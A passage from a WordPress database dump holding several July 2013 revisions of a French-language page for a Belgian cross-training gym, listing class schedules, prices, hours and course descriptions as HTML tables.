alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:29:16', '2013-07-03 16:29:16', '', 11, 'http://www.crosstrainingcenter.be/?p=166', 0, 'revision', '', 0),
(162, 1, '2013-07-03 16:17:49', '2013-07-03 16:17:49', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n[table caption=\"En semaine\" width=\"700\" colwidth=\"30|50|50|50|50|50\" colalign=\"right|left|left|left|left|left\"]\r\n,Lundi[attr class=\"ttitre\"],Mardi,Mercredi,Jeudi,Vendredi\r\n17h30,TRX,CARDIO,RIP-KETTLE,GLFE,TRX\r\n18h15,GLFE,TRX,CARDIO,RIP-KETTLE,GLFE\r\n19h00,RIP-KETTLE,GLFE,TRX,CARDIO,RIP-KETTLE\r\n19h45,CARDIO,RIP-KETTLE,GLFE,TRX,CARDIO\r\n[/table]\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:17:49', '2013-07-03 16:17:49', '', 11, 'http://www.crosstrainingcenter.be/?p=162', 0, 'revision', '', 0),
(171, 1, '2013-07-03 16:34:43', '2013-07-03 16:34:43', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td >TRX</td>\r\n<td >CARDIO</td>\r\n<td >RIP-KETTLE</td>\r\n<td >GLFE</td>\r\n<td>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:34:43', '2013-07-03 16:34:43', '', 11, 'http://www.crosstrainingcenter.be/?p=171', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(170, 1, '2013-07-03 16:33:46', '2013-07-03 16:33:46', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td class=\"theure\">TRX</td>\r\n<td class=\"theure\">CARDIO</td>\r\n<td class=\"theure\">RIP-KETTLE</td>\r\n<td class=\"theure\">GLFE</td>\r\n<td class=\"theure\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 